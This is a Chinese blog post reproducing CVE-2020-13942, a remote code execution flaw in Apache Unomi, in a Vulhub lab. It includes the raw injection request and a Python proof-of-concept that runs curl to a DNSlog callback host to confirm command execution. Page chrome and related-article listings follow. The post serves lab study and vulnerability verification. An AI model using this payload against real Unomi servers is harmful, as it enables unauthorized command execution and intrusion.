Apache Unomi 远程表达式代码执行漏洞(CVE-2020-13942),python编写POC

最新推荐文章于 2023-10-24 14:25:44 发布
原创 最新推荐文章于 2023-10-24 14:25:44 发布 · 1.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #web安全 #安全漏洞

该博客介绍了如何使用Vulhub来搭建环境并复现CVE-2020-13942,这是一个Unomi组件中的命令注入漏洞。作者通过docker-compose启动相关服务,并展示了利用POST请求触发漏洞的POC代码。通过请求DNSlog验证了命令执行的结果。

环境搭建:

使用vulhub,进入对应文件夹启动环境:


[root@localhost /]# cd /home/vulhub/unomi/CVE-2020-13942/
[root@localhost CVE-2020-13942]# docker-compose up -d

查看端口:


[root@localhost CVE-2020-13942]# docker ps
CONTAINER ID   IMAGE                 COMMAND                  CREATED          STATUS          PORTS                                                                                  NAMES
90f4b717eb3f   vulhub/unomi:1.5.1    "/docker-entrypoint.…"   23 minutes ago   Up 23 minutes   0.0.0.0:8181->8181/tcp, :::8181->8181/tcp, 0.0.0.0:9443->9443/tcp, :::9443->9443/tcp   cve-2020-13942_web_1
5c2f2cf5bc14   elasticsearch:7.9.3   "/tini -- /usr/local…"   23 minutes ago   Up 23 minutes   9200/tcp, 9300/tcp                                                                     cve-2020-13942_elasticsearch_1
[root@localhost CVE-2020-13942]#

漏洞复现:

POST /context.json HTTP/1.1
Host: 192.168.10.10:8181
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 494

{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"curl 1c6p9a.dnslog.cn
\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}

使用请求dnslog的方式验证命令执行结果。

在这里插入图片描述

POC编写:

import requests,random,time

url = "http://192.168.10.10:8181/"

session = requests.session() # 维持session
dnslog = session.get(f"http://www.dnslog.cn/getdomain.php?t={str(random.random())}").text  # 获取一个子域名

json={"filters": [{"filters": [{"condition": {"parameterValues": {"": f"script::Runtime r = Runtime.getRuntime(); r.exec(\"curl {dnslog}\r\");"}, "type": "profilePropertyCondition"}}], "id": "sample"}], "sessionId": "sample"}
requests.post(url + "context.json",  json=json)
time.sleep(2)

dnslog_res = session.get(f"http://www.dnslog.cn/getrecords.php?t={str(random.random())}").text # 获取这个子域名被请求的结果
if dnslog in dnslog_res:
    print("CVE-2020-13942")

pycharm运行结果:
在这里插入图片描述

GeoServer 属性名表达式前台代码执行漏洞CVE-2024-36401)
4SecNet团队专栏
09-29 624
GeoServer是一个开源服务器,用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准,使用户能够通过网络访问和操作地理信息系统(GIS)数据,遵循OGC开放标准的开源WFS-T和WMS服务器。在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。nuclei格式检测规则。python脚本扫描。
[ vulhub漏洞复现篇 ] Struts2 远程命令执行漏洞CVE-2020-17530)(S2-061)
qq_51577576的博客
08-22 885
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
Apache Unomi 远程表达式代码执行漏洞CVE-2020-13942
黑白的博客
05-02 431
声明 好好学习,天天向上 漏洞描述 Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为CVE-2020-11975,而CVE-2020-13942
Apache Unomi远程代码执行漏洞(CVE-2020-13942)
Li-D的博客
06-04 1231
漏洞描述 Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 在Apache Unomi 1.5.1版本之前,存在一处表达式注入漏洞,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。 漏洞
Apache Unomi 远程表达式代码执行漏洞(CVE-2020-13942)
weixin_44047654的博客
10-24 536
Apache Unomi 远程表达式代码执行漏洞(CVE-2020-13942)
漏洞复现】vulhub unomi/CVE-2020-13942
qq_46421742的博客
07-03 721
进入靶场页面,使用burp进行抓包,发送到重放器模块构造数据包,更改请求方式,将get包改为post请求包,删除多余的字段,保留Host、User-Agent和Content-Length字段,然后添加以下数据(通过MVEL表达式执行任意命令),在DNSLog添加成自己的地址(DNSLog平台生成的随机域名),此处访问不到,尝试几次还是不行,查了相关复现资料,阅读很多文章,最终发现有博主出现和我一样的问题。本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。重新拉取环境,成功。
CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现
kukudeshuo的博客
02-18 489
CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现 简介 Apache Unomi 是一个基于标准的客户/数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。 Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为:
Apache Unomi 远程代码执行漏洞复现(CVE-2020-13942)
doctor__的博客
07-20 567
目录漏洞信息环境搭建漏洞复现通过Python脚本执行getshell操作修复建议 漏洞信息 项目 Value 漏洞名称 Apache Unomi远程代码执行漏洞 漏洞编号 CVE-2020-13942 危害等级 高危 CVSS评分 7.2 漏洞厂商 Apache 受影响版本 Apache Unomi<1.5.2 漏洞概述 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)复现
玄道的网安博客
12-11 7262
漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。 影响版本 Apache Struts 2.0.0 - 2.5.25 环境搭建 这里使用docker进行安装 项目地址: https://github....
Struts2 S2-057 远程代码执行漏洞(CVE-2018-11776)
玄道的网安博客
06-30 881
影响环境 Struts<= Struts 2.3.34, Struts 2.5.16 环境搭建 cd vulhub/struts2/s2-057 docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。 Pa..
CVE-2020-16898_exp_poc
12-11
CVE-2020-16898的exp和poc
CVE-2020-13942Apache Unomi 远程代码执行漏洞复现)
痴人说梦梦中人
11-26 1032
一、漏洞描述 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月 Unomi 成为Apache 软件基金会项目。在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为CVE-2020-119
漏洞复现----37、Apache Unomi 远程代码执行漏洞 (CVE-2020-13942)
七天
06-29 1264
CVE-2020-11975&CVE-2020-13942漏洞
Apache Unomi 远程代码执行漏洞CVE-2020-13942)复现
玄道的网安博客
01-21 763
漏洞描述 Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 Apache Unomi允许远程攻击者使用可能包含任意类的MVEL和OGNL表达式发送恶意请求,从而产生具有Unomi应用程序特权的远程代码执行(RCE)。目前互联网上已经公布漏洞利用相关POC,建议相关用户及时进行资产自查。 影响..
Apache apisix默认密钥漏洞CVE-2020-13945)
Bird&Bird
03-11 2456
Apache APISIX 是一个动态、实时、高性能的 API 网关,基于 Nginx 网络库和 etcd 实现, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API,没有配置相应的IP访问策略,且没有修改配置文件Token的情况下,则攻击者利用Apache APISIX的默认Token即可访问Apache APISIX,从而控制APISIX网关。
vulhub漏洞复现-Apache APISIX 默认密钥漏洞CVE-2020-13945)
weixin_45095113的博客
12-21 1046
vulhub漏洞复现-Apache APISIX 默认密钥漏洞CVE-2020-13945)
CVE-2020-13942 (Apache Unomi 远程代码执行漏洞) 复现
thelostworld
11-23 2378
CVE -2020-13942 (Apache Unomi 远程代码执行漏洞) 一、漏洞描述: Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞..
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值